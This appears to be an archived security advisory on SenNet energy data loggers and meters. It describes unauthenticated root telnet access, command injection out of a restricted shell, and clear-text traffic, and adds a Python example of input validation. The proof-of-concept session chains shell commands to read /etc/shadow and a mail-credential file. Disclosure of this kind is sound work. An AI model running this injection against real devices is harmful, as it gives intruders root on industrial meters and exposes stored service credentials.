
SenNet Data Logger / Electricity Meter Code Execution

Posted Apr 6, 2017
Authored by Karn Ganeshen

SenNet data logger and electricity meter appliances suffer from insecure configuration and OS command injection vulnerabilities.

tags | exploit, vulnerability
SHA-256 | af974497ffb69114fb44715f152d81b4463d76f11a1ae74ed3a4e791dae40a58

SenNet Data Logger appliances and Electricity Meters Multiple
Vulnerabilities

Note: Vendor has released the fix. Details to be documented in ICS-CERT
Advisory.

About
SenNet is a trademark of Satel Spain that offers monitoring and
remote-control solutions for businesses. Our engineers develop, integrate
and test the products of SenNet in our facilities in Madrid (Spain).

http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf

Vulnerable products

SenNet Optimal DataLogger appliance
SenNet Solar DataLogger appliance
SenNet Multitask Meter

Deployment Geography
Americas and Europe regions

Target Audience / Industry
Energy, Power, Service Providers, Telecom

Note: all appliances seem to be running on the same code base, and
therefore all SenNet models and software versions stand vulnerable.

Appliances Confirmed affected:

SenNet Solar
Datalogger Model: OWA3X
Serial Number: A04WCJ
Licence type: A02
Version: V5.03-1.56a

SenNet Optimal
Datalogger Model: OWA31
Serial Number: A05B89
License type: A02
Version: V5.37c-1.43c

SenNet Multitask Meter
Datalogger Model: OWA3X
Serial Number: A04ZZ3
Licence type: A02
Version: V5.21a-1.18b

SenNet Optimal is a monitoring solution to meter consumption (electricity,
gas, water) and other variables (temperature, humidity, presence, lighting
...); both for industries and for businesses in the tertiary sector.

http://www.sennetmonitoring.com/en/sennet-optimal-2/

SenNet Solar is a solution for monitoring. It is suitable for any kind of
power generation plants. In this type of facilities, it is essential to
monitor and remotely control the devices involved in the process:
inverters, meters, trackers, etc.

http://www.sennetmonitoring.com/en/sennet-solar/

SenNet Meter is an ideal device for electricity submetering.
http://www.sennetmonitoring.com/en/electricity-meters/

Vulnerability Details

1. No access control on the remote shell
The appliance runs ARM as the underlying OS. Telnet access is enabled on TCP
port 5000. No authentication is required to connect to the remote shell.
Any user can connect to the shell and issue commands.

2. Shell services running with excessive privileges (superuser)
The service runs with superuser (root) privileges, thus giving privileged
access to any user, without any authentication (exploited via the OS Command
Injection described next).

3. OS Command Injection
The remote shell (attempts to) offer a restricted environment, and does not
allow executing system commands. However, it is possible to break out of
this jailed shell by chaining specific shell meta-characters and OS
commands.

The service / application is run as 'root' and OS command injection results
in full system access.
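
A restricted shell resists this kind of breakout when it matches each input line against a fixed grammar and dispatches in-process, so that no text ever reaches /bin/sh. The following is an added example, not code from the vendor or the advisory; the command names (status, show), their arguments and the length limit are hypothetical.

```python
import re

# Hypothetical command table; the appliance's real command set is not on the page.
COMMANDS = {
    "status": (),                              # takes no arguments
    "show": ("version", "serial", "network"),  # one argument from a fixed set
}

# Whole-line grammar: a command word plus optional lowercase-word arguments.
# Anything else (; | & $ ` quotes, paths, control bytes) fails the match.
LINE_RE = re.compile(r"[a-z]+(?: [a-z]+)*")
MAX_LEN = 64  # assumed upper bound for one input line


class Rejected(ValueError):
    """Input that does not match the restricted grammar."""


def parse_command(raw: bytes) -> list[str]:
    """Return [command, *args] for an allowed line, else raise Rejected."""
    if len(raw) > MAX_LEN:
        raise Rejected("line too long")
    try:
        line = raw.decode("ascii")
    except UnicodeDecodeError:
        raise Rejected("non-ASCII input") from None
    line = line.rstrip("\r\n")  # telnet line ending; embedded CR/LF still fails below
    if not LINE_RE.fullmatch(line):
        raise Rejected("characters outside the command grammar")
    name, *args = line.split(" ")
    if name not in COMMANDS:
        raise Rejected(f"unknown command: {name}")
    allowed_args = COMMANDS[name]
    if not allowed_args:
        if args:
            raise Rejected(f"{name} takes no arguments")
    elif len(args) != 1 or args[0] not in allowed_args:
        raise Rejected(f"bad argument for {name}")
    return [name, *args]


def handle_line(raw: bytes) -> str:
    """Dispatch a validated command in-process; the line is never given to a shell."""
    try:
        argv = parse_command(raw)
    except Rejected as exc:
        return f"ERR {exc}"
    return "OK " + " ".join(argv)
```

The same handler belongs behind authentication and under an unprivileged account, since the first two findings apply regardless of how input is parsed.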

Apart from energy logging data, the device stores sensitive information
such as FTP, SMTP and other service login credentials, used by the
application for its own functions as well as to connect to other external,
public-facing servers.

PoC:

# telnet IP 5000 2>/dev/null
Trying IP...
Connected to IP.
Escape character is '^]'.
$ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;
/bin/sh: $: not found
uid=0(root) gid=0(root)
/home
root:$1$<removed-for-report>:13852:0:99999:7:::
nobody:*:13852:0:99999:7:::
nfsnobody:!!:13852:0:99999:7:::
PID USER VSZ STAT COMMAND
1 root 2412 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
<snip>
root=postmaster
mailhub=<removed>:25
rewriteDomain=example.com
hostname=_HOSTNAME_
<snip>

4. Insecure Transport - all communications are clear-text, and prone to
sniffing.

+++++
Metasploit module will be released shortly.
+++++

